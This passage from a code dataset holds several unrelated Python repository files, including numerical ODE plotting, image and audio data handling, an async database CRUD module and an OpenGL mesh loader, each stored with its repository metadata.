os.path.isdir(cur_path): # 子文件\n target.write(\"{blank}- {dir_name}\\n\".format(blank=' ' * 2 * level, dir_name=filename))\n scan_file(cur_path, level + 1, target)\n elif level != 0 and filename[0] != '.' 
and filename.endswith('.md'):\n target.write(\"{blank}- [{filename}]({cur_path})\\n\".format(blank=' ' * 2 * level, filename=filename,\n cur_path=cur_path))\n\n\n# 生成sidebar 文件\ndef gen_sidebar():\n print(\"开始生成sidebar文件\\n\")\n os.chdir('docs')\n with open(\"_sidebar.md\", \"w\", encoding='utf-8') as f:\n scan_file(\".\", 0, f)\n\n\nif __name__ == '__main__':\n gen_sidebar()\n","repo_name":"yanleiwang/yanleiwang.github.io","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1188091267","text":"# Menu selector of milestone 4\n\n\n\nfrom common.config import Config\nfrom common.menu import Menu\n\nfrom common import schemes\nfrom common.config import Config\nfrom common.odes import Cauchy\nfrom common.physics import Oscilador\nfrom common.stability import RegionEstabilidad\nfrom matplotlib import pyplot as plt\nfrom numpy import array, linspace, cos, sin, absolute\nfrom typing import Callable\n\n\n\ndef menu():\n menu = Menu()\n\n menu.additem(\"oscil\", 1, \"Calculate oscilator movement\", oscilmenu)\n menu.additem(\"region\", 2, \"Visualize Stability Region\", regionmenu)\n\n menu.menu()\n\ndef oscilmenu():\n menu = Menu()\n\n menu.additem(\"eu\", 1, \"Euler\", lambda : oscillator(schemes.Euler) )\n menu.additem(\"ie\", 2, \"Inverse Euler\", lambda : oscillator(schemes.EulerInverso) )\n menu.additem(\"ie\", 3, \"Crank Nicolson\", lambda : oscillator(schemes.CrankNicolson))\n menu.additem(\"ie\", 4, \"Runge-Kutta 4\", lambda : oscillator(schemes.RungeKutta) )\n menu.additem(\"ie\", 5, \"Leap-Frog\", lambda : oscillator(schemes.LeapFrog) )\n\n menu.menu()\n\ndef regionmenu():\n menu = Menu()\n\n menu.additem(\"eu\", 1, \"Stability Region of Euler\", lambda : region(schemes.Euler) )\n menu.additem(\"ie\", 2, \"Stability Region of Inverse Euler\", lambda : region(schemes.EulerInverso) )\n menu.additem(\"ie\", 3, \"Stability Region of Crank Nicolson\", lambda : region(schemes.CrankNicolson))\n menu.additem(\"ie\", 4, \"Stability Region of Runge-Kutta 4\", lambda : region(schemes.RungeKutta) )\n #menu.additem(\"ie\", 5, \"Stability Region of Leap-Frog\", lambda : region(LeapFrogModified) )\n\n menu.menu()\n\n\ndef oscillator(scheme: Callable):\n # Default configuration.\n N = 100\n U0 = array([1,0]) \n t = linspace(0, 10, N)\n\n U = Cauchy( U0, t, Oscilador, scheme)\n\n fig, (xax, vax) = plt.subplots(1, 2)\n\n xax.plot(t, U[:,0],\"r\", label = \"Solución Numérica\")\n xax.plot(t, cos(t),\"--\",color = \"r\", label = \"Solución Analítica\")\n\n vax.plot(t, U[:,1],\"g\", label = \"Velocidad Numérica\")\n vax.plot(t, -sin(t),\"--\",color = \"g\", label = \"Velocidad Analítica\")\n\n plt.title(f\"Oscilador Armónico para esquema {scheme.__name__}\")\n\n xax.set_xlabel(\"t\")\n xax.set_ylabel(\"x(t)\")\n xax.legend(loc=\"lower left\")\n\n vax.set_xlabel(\"t\")\n vax.set_ylabel(\"v(t)\")\n vax.legend(loc=\"lower left\")\n\n xax.grid()\n plt.show()\n\n\n\ndef region(scheme: Callable):\n # Default configuration.\n N = 100\n X = linspace(-5, 5, N)\n Y = linspace(-5, 5, N)\n\n # Calculate the stability region.\n region = absolute( RegionEstabilidad(scheme) )\n\n # Plot the stability region.\n CSF = plt.contourf(X, Y, region, levels=[0,1], colors=['#E0E0E0'])\n #CS = plt.contour(X, Y, region, levels = [0.25, 0.5, 0.75, 1, 1.25, 1.5])\n CS = plt.contour(X, Y, region, levels = [0.1 * (i+1) for i in range(15)])\n\n plt.title(f'Region de Estabilidad Absoluta de 
{scheme.__name__}')\n plt.xlabel('Re(|r|)')\n plt.ylabel('Im(|r|)')\n\n plt.xlim([-5, 5])\n plt.ylim([-5, 5])\n\n plt.legend(loc = \"lower left\")\n\n plt.grid()\n plt.show()\n","repo_name":"jahrTeaching/milestones-agserWork","sub_path":"sources/milestone4/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14929289146","text":"from joblib import load\nimport numpy as np\n\n# Weight factors\na_1 = 1\na_2 = 1 \na_3 = 1\n\n# Working directory\nwkdir = r\"C:\\TEMP\\Dymola\"\n\n\ndef agent_1():\n # Load the classifier: returns trajectory class\n clf = load(wkdir + r\"\\heater-clf.joblib\")\n\n # Load the cost of each class\n cost_clf = load(wkdir + r\"\\cost-clf.joblib\")\n av_clf = load(wkdir + r\"\\av-clf.joblib\")\n prob_dic = {1:0.1,2:0.3,3:0.1,4:0.5}\n\n return clf, prob_dic, cost_clf, av_clf\n\ndef agent_2(input, probs):\n \n # Standard sequences used for this case study\n seq = [[0,0],[100,100],[45,35],[60,50],[30,20],[50,50],[20,20]]\n min_cost = []\n\n # Load the subsystem model and the corresponding scaler\n MLPModel = load(wkdir + r\"\\heater.joblib\")\n scaler = load(wkdir + r\"\\heater_scaler.joblib\")\n\n # Get all the information from the other agent\n clf, prob_dic, cost_clf, av_clf = agent_1()\n\n \n for l,w in enumerate(input):\n cost = []\n kl = []\n for k,u in enumerate(seq):\n count_c = 0\n command = []\n Temp = []\n x_train =[]\n v = []\n tim_con = 10\n\n for t in range(70):\n\n if t < 10:\n com = 0\n elif t < 40:\n com = u[0]\n else:\n com = u[1]\n\n Temp.append(w)\n\n if t > 0:\n if abs(com-command[-1])>0.001:\n if count_c < tim_con:\n command.append(command[-1] + (com-command[-1])/(tim_con-count_c))\n count_c += 0\n else:\n command.append(com)\n count_c = 1\n else:\n command.append(com)\n else:\n command.append(com)\n\n x_train = np.stack((command, Temp), axis=1)\n\n x_train = np.array(x_train)\n\n scaled_instances = scaler.transform(x_train)\n temp = MLPModel.predict(scaled_instances)\n\n entr = 0\n\n for t in range(10,70,1):\n dif = temp[t] - temp[t-1]\n v.append(dif)\n Twout = 273+ 50 - 0.5*1000*(temp[t]-w)/0.25/4180\n entr += abs(0.5*1000*np.log((273 + w)/(273 + temp[t])) +\n 0.25*4180*np.log((273 + 50)/(Twout)))\n\n entr = entr/60\n\n av = 0\n for t in range(60,70,1):\n av += temp[t]\n\n av = av/10\n\n values = [val for k,val in enumerate(v)]\n\n\n x_test = [values]\n\n # Find the correct class \n cl = clf.predict(x_test)\n\n x_test = [[av, cl[0]]]\n\n # Cost of the downstream subsystem\n c1 = np.interp(av,av_clf[cl[0]-1],cost_clf[cl[0]-1])\n\n # KL-divergence\n kl.append(a_3*probs[l]*np.log(probs[l]/prob_dic[float(cl)]))\n\n # Cost in the subsystem itself\n cost.append(a_1*c1 + a_2*entr + \n a_3*probs[l]*np.log(probs[l]/prob_dic[float(cl)]))\n \n # Find the minimal cost\n min_cost.append(min(cost))\n pos = np.argmin(cost)\n\n print(kl[pos])\n print(min(cost))\n print(min(cost)-kl[pos])\n\n return min_cost\n\ndef main():\n agent_2([30],[1])\n\nif __name__==\"__main__\": main()\n","repo_name":"RWTH-EBC/pyDMPC","sub_path":"pyDMPC/SpecialStudies/entropy-agents.py","file_name":"entropy-agents.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"7077663221","text":"import numpy as np\nimport os\nimport cv2\nimport random\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import 
train_test_split\n\nCATEGORIES = [\"star\", \"galaxy\"]\nIMGSIZE = 128\n\n\ndef createTrainingData():\n # Directory of the training dataset\n DATADIR = \"C:/Users/HENAFF/Documents/StarGalaxy Classification/data/train/\"\n training_data = []\n train_X, train_Y = [], []\n\n # Going through different category of data\n for cat in CATEGORIES:\n # Selecting folder betwenen categories\n path = os.path.join(DATADIR, cat)\n # getting index of each category\n classnum = CATEGORIES.index(cat)\n # going through each image\n for img in os.listdir(path):\n try:\n # Reading and giving a gray scale\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n # resize to the size given\n new_array = cv2.resize(img_array, (IMGSIZE, IMGSIZE))\n training_data.append([new_array, classnum])\n except Exception as e:\n print(\"Image {} from {} is not working properly\".format(img, cat))\n\n # Shuffle data so the first half is not the first category\n random.shuffle(training_data)\n\n # split the image into train_X and the classification into train_Y\n for x, y in training_data:\n train_X.append(x)\n train_Y.append(y)\n\n # change to numpy array\n train_X = np.array(train_X)\n train_Y = np.array(train_Y)\n\n # Useless but classy\n training_data.clear()\n\n return train_X, train_Y\n\n\ndef createTestingData():\n # Directory of the testing dataset\n DATADIR = \"C:/Users/HENAFF/Documents/StarGalaxy Classification/data/train/\"\n testing_data = []\n test_X, test_Y = [], []\n\n # Going through different category of data\n for cat in CATEGORIES:\n # Selecting folder betwenen categories\n path = os.path.join(DATADIR, cat)\n # getting index of each category\n classnum = CATEGORIES.index(cat)\n # going through each image\n for img in os.listdir(path):\n try:\n # Reading and giving a gray scale\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE)\n # resize to the size given\n new_array = cv2.resize(img_array, (IMGSIZE, IMGSIZE))\n testing_data.append([new_array, classnum])\n except Exception as e:\n print(\"Image {} from {} is not working properly\".format(img, cat))\n\n # Shuffle data so the first half is not the first category\n random.shuffle(testing_data)\n\n # split the image into test_X and the classification into test_Y\n for x, y in testing_data:\n test_X.append(x)\n test_Y.append(y)\n\n # change to numpy array\n test_X = np.array(test_X)\n test_Y = np.array(test_Y)\n\n # Useless but classy\n testing_data.clear()\n\n return test_X, test_Y\n\n\n###################################\n# DATA PREPROCESSING\n###################################\ndef dataPreProcessing():\n # Load Data\n train_X, train_Y = createTrainingData()\n test_X, test_Y = createTestingData()\n\n # Reshape the array into a 3 dimension matrix\n train_X = train_X.reshape(-1, IMGSIZE, IMGSIZE, 1)\n test_X = test_X.reshape(-1, IMGSIZE, IMGSIZE, 1)\n print(train_X.shape, test_X.shape)\n # Convert type of data from int8 to float32 because keras works best with float32\n train_X = train_X.astype('float32')\n test_X = test_X.astype('float32')\n\n # Change the image to make pixels onto the 0 and 1 interval\n train_X = train_X / 255\n test_X = test_X / 255\n\n # Convert category to one-hot encoding vector\n train_Y_one_hot = to_categorical(train_Y)\n test_Y_one_hot = to_categorical(test_Y)\n\n # Split the training data into 80% of training and 20% of validation\n train_X, valid_X, train_label, valid_label = train_test_split(train_X, train_Y_one_hot, test_size=0.2,\n random_state=1, shuffle=True)\n\n return train_X, valid_X, 
train_label, valid_label, test_X, train_Y_one_hot, test_Y_one_hot\n","repo_name":"Theo-HENAFF/star_galaxy_classification","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44446153362","text":"\"\"\"\nFilter ``cldf/entries.csv`` according to year or first appearance and\netymological origin. Run ``cldfbench gerstnerhungarian.filter --help``\nfor help.\n\"\"\"\nimport csv\nimport re\n\nfrom clldutils.misc import slug\nfrom loanpy.utils import find_optimal_year_cutoff, IPA\n\nORIGINS = (\"Proto-Uralic\", \"Proto-Finno-Ugric\", \"Proto-Ugric\",\n \"Turkic\", \"unknown\", \"uncertain\")\n\ndef find_empty(senses_file):\n \"\"\"\n Loop through ``cldf/senses.csv`` and add ``Entry_ID`` to list if ``Spacy``\n empty.\n \"\"\"\n empty_keys = set()\n with open(senses_file, 'r') as f:\n senses = list(csv.reader(f))\n h = {i: senses[0].index(i) for i in senses[0]}\n for row in senses:\n if not row[h[\"Spacy\"]]:\n empty_keys.add(row[h[\"Entry_ID\"]])\n\n return empty_keys\n\ndef add_all_etymologies(entries, h):\n \"\"\"\n Loop through column ``Etymology`` in ``entries.csv`` and return a set\n of all possible etymologies.\n \"\"\"\n etym = set()\n for row in entries:\n if row[h[\"Etymology\"]]:\n etym.add(row[h[\"Etymology\"]])\n return etym\n\ndef register(parser):\n \"\"\"\n Register arguments for the run-function. Three optional flags: -y -o -a.\n An integer after -y indicates the year above which words are filtered out.\n The string after -o indicates the etymological origins the words in the\n output should belong to. If -a is toggled on, words with missing data\n will be included in the output.\n \"\"\"\n parser.add_argument(\"-y\", \"--cutoff-year\", dest=\"cutoff_year\", nargs=\"?\",\n default=None, help=\"Higher years will be filtered out\")\n parser.add_argument(\"-o\", \"--etymology\", dest=\"etymology\", nargs=\"?\",\n default=None, help=\"Etymological origins to keep\")\n parser.add_argument(\"-a\", \"--add-empty\", dest=\"add_empty\",\n action=\"store_true\", help=\"Adds word with missing information about \\\nyear of first appearance or etymological origin if toggled on\")\n\n\ndef run(args):\n \"\"\"\n #. Read ``cldf/entries.csv``\n #. Filter according to year of first appearance, etymological origin,\n and missing data.\n #. 
write results to ``loanpy/hun{year}{etymology}.tsv``\n \"\"\"\n\n # Read entries content\n with open(\"cldf/entries.csv\", \"r\") as f:\n entries = list(csv.reader(f))\n h = {i: entries[0].index(i) for i in entries[0]}\n\n filename = args.etymology\n if not args.cutoff_year:\n args.cutoff_year = find_optimal_year_cutoff(entries, ORIGINS)\n if not args.etymology:\n args.etymology = add_all_etymologies(entries, h)\n filename = \"all\"\n\n # create entries\n entries_filtered = [[\"ID\", \"EntryID\", \"Year\", \"Etymology\"]]\n empty_keys = find_empty(\"cldf/senses.csv\")\n i = 0\n for row in entries[1:]:\n if row[h[\"ID\"]] not in empty_keys:\n if row[h[\"Year\"]] and row[h[\"Etymology\"]]:\n if int(row[h[\"Year\"]]) < int(args.cutoff_year):\n if row[h[\"Etymology\"]] in args.etymology:\n entries_filtered.append(\n [str(i) + \"-\" + row[h[\"ID\"]], row[h[\"ID\"]],\n row[h[\"Year\"]], row[h[\"Etymology\"]]]\n )\n elif args.add_empty:\n entries_filtered.append(\n [str(i) + \"-\" + row[h[\"ID\"]], row[h[\"ID\"]],\n row[h[\"Year\"]], row[h[\"Etymology\"]]]\n )\n\n i += 1\n\n\n with open(f\"loanpy/hun{args.cutoff_year}{filename}.tsv\", \"w+\",\n newline=\"\") as f:\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerows(entries_filtered)\n","repo_name":"LoanpyDataHub/gerstnerhungarian","sub_path":"gerstnerhungariancommands/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659526913","text":"import datetime\n\nfrom loguru import logger\nfrom sqlalchemy import insert, select, update, delete\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom .. import schemas\nfrom ..models.day_ratings import DayRating\nfrom ..utils import sa_objects_dicts_list\n\n\nasync def create_day_rating(day_rating: schemas.DayRatingCreate, db: AsyncSession):\n\t\"\"\"\n\tCreate a day rating.\n\t\"\"\"\n\tday_rating_dict = day_rating.dict()\n\tday_rating_dict.setdefault(\"date\", datetime.date.today())\n\tquery = insert(DayRating).values(\n\t\t**day_rating_dict\n\t)\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {day_rating_dict['date']} was \"\n\t\t\t\tf\"successfully created by user with ID: {day_rating.user_id}\")\n\n\treturn day_rating_dict\n\n\nasync def get_day_ratings(db: AsyncSession):\n\t\"\"\"\n\tGet all day ratings.\n\t\"\"\"\n\tquery = select(DayRating).order_by(DayRating.date)\n\tresult = await db.execute(query)\n\treturn sa_objects_dicts_list(result.scalars().all())\n\n\nasync def get_day_ratings_me(current_user: schemas.User, filtering_params: dict[str, bool], db: AsyncSession):\n\t\"\"\"\n\tGet all of the current user's own day ratings.\n\n\tIf a filter parameter is True, only the ratings where that rating\n\tparameter is FILLED IN (not necessarily equal to True) are returned.\n\t\"\"\"\n\tquery = select(DayRating).where(DayRating.user_id == current_user.id).order_by(DayRating.date)\n\tresult = await db.execute(query)\n\tuser_day_ratings = sa_objects_dicts_list(result.scalars().all())\n\tif not any(filtering_params.values()):\n\t\treturn user_day_ratings\n\tfilters = [key for key, val in filtering_params.items() if val is True]\n\n\treturn [\n\t\trating for rating in user_day_ratings if\n\t\tall((rating[param] is not None for param in filters))\n\t]\n\n\nasync def update_day_rating(current_day_rating: schemas.DayRating,\n\t\t\t\t\t\t\tupdated_day_rating: schemas.DayRatingUpdate,\n\t\t\t\t\t\t\tdb: 
AsyncSession):\n\t\"\"\"\n\tОбновление оценки дня.\n\tИзменить можно только оценочные bool-параметры.\n\t\"\"\"\n\tupdated_day_rating.user_id = current_day_rating.user_id\n\n\tcurrent_day_rating_dict = current_day_rating.dict()\n\tfor key, val in updated_day_rating.dict().items():\n\t\tif val is not None:\n\t\t\tcurrent_day_rating_dict[key] = val\n\n\tquery = update(DayRating).where(\n\t\t(DayRating.user_id == current_day_rating.user_id) &\n\t\t(DayRating.date == current_day_rating.date)\n\t).values(\n\t\t**current_day_rating_dict\n\t)\n\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {current_day_rating.date} was successfully \"\n\t\t\t\tf\"updated by creator with ID: {current_day_rating.user_id}\")\n\n\treturn {**current_day_rating_dict, \"date\": current_day_rating.date}\n\n\nasync def delete_day_rating(day_rating: schemas.DayRating, db: AsyncSession):\n\t\"\"\"\n\tУдаление оценки дня.\n\t\"\"\"\n\tquery = delete(DayRating).where(\n\t\t(DayRating.user_id == day_rating.user_id) &\n\t\t(DayRating.date == day_rating.date)\n\t)\n\tawait db.execute(query)\n\tawait db.commit()\n\n\tlogger.info(f\"Day rating for date {datetime.date.today()} was \"\n\t\t\t\tf\"successfully deleted by user with ID: {day_rating.user_id}\")\n\n\treturn day_rating\n","repo_name":"Dahaka1/eztask","sub_path":"app/crud/crud_day_ratings.py","file_name":"crud_day_ratings.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74003428","text":"class Solution:\n def findLucky(self, arr: List[int]) -> int:\n mp = collections.defaultdict()\n \n for num in arr:\n if num not in mp:\n mp[num] = 0\n mp[num] += 1\n \n res = -1\n for key, val in mp.items():\n if key==val and key>res:\n res = key\n \n return res","repo_name":"Anirudh-Muthukumar/Leetcode-Solutions","sub_path":"1394. Find Lucky Integer in an Array/1394. Find Lucky Integer in an Array.py","file_name":"1394. 
Find Lucky Integer in an Array.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5615129179","text":"from glfuncs import *\nfrom glconstants import *\nfrom Program import *\nfrom Texture import *\nimport pysdl2.sdl2 as sdl2\nimport sys\nfrom ctypes import *\n\nclass Mesh:\n def __init__(self,fname,texture):\n fp=open(fname,'rb')\n if 1:\n line=fp.readline().decode().strip()\n assert line==\"mesh_01\"\n while 1:\n \n line=fp.readline().decode().strip()\n \n if line==\"end\":\n break\n elif line.startswith(\"num_vertices\"):\n lst=line.split()\n self.numv=int(lst[1])\n elif line.startswith(\"num_triangles\"):\n lst=line.split()\n self.numt=int(lst[1])\n elif line.startswith(\"texture_file\"):\n lst=line.split()\n \n elif line.startswith(\"vertices\"):\n numbytes=self.numv*3*4\n vdata=fp.read(numbytes)\n elif line.startswith(\"texcoords\"):\n numbytes=self.numv*2*4\n tdata=fp.read(numbytes)\n elif line.startswith(\"normals\"):\n numbytes=self.numv*3*4\n ndata=fp.read(numbytes)\n elif line.startswith(\"indices\"):\n numbytes=self.numt*3*2\n idata=fp.read(numbytes)\n \n else:\n pass\n \n tmp=array.array(\"I\",[0])\n glGenVertexArrays(1,tmp)\n self.vao = tmp[0]\n glBindVertexArray(self.vao)\n self.tex=texture\n glGenBuffers(1,tmp)\n self.vbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.vbuff)\n glBufferData(GL_ARRAY_BUFFER,len(vdata),vdata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.POSITION_INDEX)\n glVertexAttribPointer(Program.POSITION_INDEX,3,GL_FLOAT,False,3*4,0)\n\n assert len(ndata) == len(vdata)\n \n glGenBuffers(1,tmp)\n self.nbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.nbuff)\n glBufferData(GL_ARRAY_BUFFER,len(ndata),ndata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.NORMAL_INDEX)\n glVertexAttribPointer(Program.NORMAL_INDEX,3,GL_FLOAT,False,3*4,0)\n\n glGenBuffers(1,tmp)\n self.tbuff = tmp[0]\n glBindBuffer(GL_ARRAY_BUFFER,self.tbuff)\n glBufferData(GL_ARRAY_BUFFER,len(tdata),tdata,GL_STATIC_DRAW)\n glEnableVertexAttribArray(Program.TEXCOORD_INDEX)\n glVertexAttribPointer(Program.TEXCOORD_INDEX,2,GL_FLOAT,False,2*4,0)\n\n glGenBuffers(1,tmp)\n self.ibuff = tmp[0]\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER,self.ibuff)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER,len(idata),idata,GL_STATIC_DRAW)\n \n glBindVertexArray(0)\n def draw(self,prog):\n prog.setUniform(\"tex\",self.tex)\n glBindVertexArray(self.vao)\n glDrawElements(GL_TRIANGLES, self.numt*3, GL_UNSIGNED_SHORT, 0 )\n\n","repo_name":"brhofmann97/Graphics_Demo","sub_path":"Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36456463309","text":"# Import basic libraries\nimport keyboard\nimport pyaudio\nimport queue\nimport wave\nimport sys\n\n\n \ndef record_audio(audio_obj,mic_id,STOP):\n # Recording parameters\n chunk = 1024\n format = pyaudio.paInt16\n channels = 1\n rate = 44100\n rec_sec = 10\n stream = audio_obj.open(format=format, \n channels=channels, \n rate=rate, \n input=True,\n input_device_index=mic_id,\n frames_per_buffer=chunk)\n \n print(\"Recording!\")\n while 1:\n # create new WAV file\n filename = \"output.wav\"\n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(audio_obj.get_sample_size(format))\n wf.setframerate(rate)\n \n for i in range(0,int(rate / chunk * rec_sec)):\n data = stream.read(chunk)\n #data = np.frombuffer(data, 
np.int16).flatten().astype(np.float32) / 32768.0\n \n #audio_data = np.frombuffer(data,dtype=np.int16).flatten().astype(np.float32) / 32768.0\n #audio_buffer.put(audio_data)\n try:\n wf.writeframes(data)\n except:\n print(\"Record : Too many requests!\")\n wf.close()\n #audio_data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0 \n #audio_data = np.frombuffer(data, dtype=np.int16)\n #audio_data = audio_data / 32768.0 # convert to float\n #audio_data = np.frombuffer(data, dtype=np.int16, count=len(data)//2, offset=0)\n #audio_data = audio_data.astype(np.float32, order='C') / 32768.0\n #audio_buffer.put(audio_data)\n \n \n if keyboard.is_pressed(\"w\") or STOP == True:\n # stop recording\n stream.stop_stream()\n stream.close()\n audio_obj.terminate()\n break\n if STOP == True:\n break\n \n print(\"Closing thread...\")\n sys.exit()\n \nif __name__ == \"__main__\": \n # Get a list of available input devices\n audio_obj= pyaudio.PyAudio()\n info = audio_obj.get_host_api_info_by_index(0)\n numdevices = info.get('deviceCount')\n device_id = []\n for i in range(0, numdevices):\n if (audio_obj.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\n print(\"Input Device id \", i, \" - \", audio_obj.get_device_info_by_host_api_device_index(0, i).get('name'))\n device_id.append(i)\n \n device = int(input(\"Choose device ID: \"))\n \n # Initialize audio buffer\n audio_buffer = queue.Queue()\n STOP = False\n # Create audio recording thread\n #t1 = threading.Thread(target=record_audio, args=(audio_obj,device_id[2],STOP))\n #t1.start()\n\n chunk = 1024\n format = pyaudio.paInt16\n channels = 1\n rate = 44100\n rec_sec = 10\n stream = audio_obj.open(format=format, \n channels=channels, \n rate=rate, \n input=True,\n input_device_index=device,\n frames_per_buffer=chunk)\n\n print(\"Recording!\")\n #time.sleep(5)\n #exit()\n count = 1\n # create new WAV file\n filename = \"output.wav\"\n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(audio_obj.get_sample_size(format))\n wf.setframerate(rate)\n while 1:\n \n \n for i in range(0,int(rate / chunk * rec_sec+1)):\n data = stream.read(chunk)\n #data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0\n \n #audio_data = np.frombuffer(data,dtype=np.int16).flatten().astype(np.float32) / 32768.0\n #audio_buffer.put(audio_data)\n \n wf.writeframes(data)\n if keyboard.is_pressed(\"esc\") or STOP == True:\n # stop recording\n stream.stop_stream()\n audio_obj.terminate()\n stream.close()\n break\n break\n \n \n \n wf.close()\n sys.exit(\"Closing program...\")\n print(f\"Writing to file: {count}\")\n count += 1\n \n #audio_data = np.frombuffer(data, np.int16).flatten().astype(np.float32) / 32768.0 \n #audio_data = np.frombuffer(data, dtype=np.int16)\n #audio_data = audio_data / 32768.0 # convert to float\n #audio_data = np.frombuffer(data, dtype=np.int16, count=len(data)//2, offset=0)\n #audio_data = audio_data.astype(np.float32, order='C') / 32768.0\n #audio_buffer.put(audio_data)\n \n \n \n\n ## Calculate memory usage\n #pid = psutil.Process()\n #memory_info = pid.memory_info()\n #print(\"Memory usage:\", memory_info.rss / 1024 / 1024, \"MB\")\n\n\n","repo_name":"ChineseWarlord/Real-Time-Speech-To-Text","sub_path":"src/Audio_Recorder.py","file_name":"Audio_Recorder.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72334035394","text":"import tensorflow as 
tf\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\nprint(\"physical_devices-------------\", len(physical_devices))\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\nimport numpy as np\nimport cv2\nimport data.imgs,files,data.feats,data.actions\nimport sim,sim.imgs\n\ndef diff_action(in_path,out_path):\n\tdef helper(frames):\n\t\tsize=len(frames)-1\n\t\tdiff=[ np.abs(frames[i]-frames[i+1]) \n\t\t\t\tfor i in range(size)]\n\t\treturn np.mean(diff,axis=0)\n\tdata.actions.get_actions(in_path,helper,out_path)\n\ndef mean_action(in_path,out_path,dims=(64,64)):\n\tdef helper(frames):\n\t\treturn np.mean(frames,axis=0)\n\tdata.actions.get_actions(in_path,helper,out_path,dims=dims)\n\ndef action_one_shot(in_path,out_path=None,n_epochs=5):\n dtw_feats=data.actions.read_actions(in_path)\n dtw_feats.transform(lambda img_i: np.expand_dims(img_i,axis=-1))\n make_model=sim.imgs.make_conv\n sim_train=sim.SimTrain(make_model,sim.all_cat)\n params={'input_shape':(64,64,1)}\n sim_train(dtw_feats,out_path,n_epochs,params)\n\nfrom keras.models import load_model\n\ndef extract(in_path,nn_path,out_path):\n action_feats=data.actions.read_actions(in_path)\n def helper(img_i):\n \timg_i=np.expand_dims(img_i,axis=-1)\n \treturn np.expand_dims(img_i,axis=0)\n action_feats.transform(helper)\n extractor=load_model(nn_path)\n new_feats=data.feats.Feats()\n for name_i,img_i in action_feats.items():\n \tnew_feats[name_i]=extractor.predict(img_i)\n new_feats.save(out_path)\n\ndef binary_one_shot(in_path,out_path,n_epochs=5):\n\tn_cats=12\n\tdataset=data.actions.read_actions(in_path)\n\tdataset.add_dim()\n\tget_cat=binary.BinaryCat()\n\tsim_nn=sim.SimTrain(sim.imgs.make_conv,get_cat)\n\tdef binary_gen(nn_path,i):\n\t\tget_cat.cat=i\n\t\tsim_nn(dataset,nn_path,n_epochs)\n\tfuncs=[[extract,[\"in_path\",\"nn\",\"feats\"]]]\n\tdir_names=[\"feats\"]\n\targ_dict={'in_path':in_path}\t\t\n\tbinary_ens=ens.BinaryEns(binary_gen,funcs,dir_names)\n\tbinary_ens(out_path,n_cats,arg_dict)\n\ndef action_img_exp(in_path,n_epochs=100):\n\tpaths=files.get_paths(in_path,['frames','mean',\"ens\"])\n\tmean_action(paths[\"frames\"],paths[\"mean\"])\n\taction_one_shot(paths[\"mean\"],paths[\"action\"],n_epochs)\n#\tbinary_one_shot(paths[\"mean\"],paths[\"ens\"],n_epochs)\n\nif __name__ == \"__main__\":\n#\taction_img_exp(\"../3DHOI/agum\",100)\n\tmean_action(\"../clean/scaled\",\"../clean/mean\",dims=None)\n#\taction_one_shot(\"../3DHOI/actions/mean\",out_path=\"../3DHOI/actions/nn\",n_epochs=200)\n#\textract(\"../3DHOI/actions/mean\",\"../3DHOI/actions/nn\",\"../3DHOI/actions/feats\")","repo_name":"tjacek/ActionClassifier","sub_path":"action_imgs.py","file_name":"action_imgs.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11867364233","text":"import pytest\n\nfrom qrules.particle import ParticleCollection\nfrom qrules.quantum_numbers import EdgeQuantumNumbers as EdgeQN\nfrom qrules.settings import (\n InteractionType,\n _create_domains,\n _halves_domain,\n _int_domain,\n create_interaction_settings,\n)\n\n\nclass TestInteractionType:\n @pytest.mark.parametrize(\n (\"description\", \"expected\"),\n [\n (\"EM\", InteractionType.EM),\n (\"e\", InteractionType.EM),\n (\"electromagnetic\", InteractionType.EM),\n (\"w\", InteractionType.WEAK),\n (\"weak\", InteractionType.WEAK),\n (\"strong\", InteractionType.STRONG),\n (\"S\", InteractionType.STRONG),\n 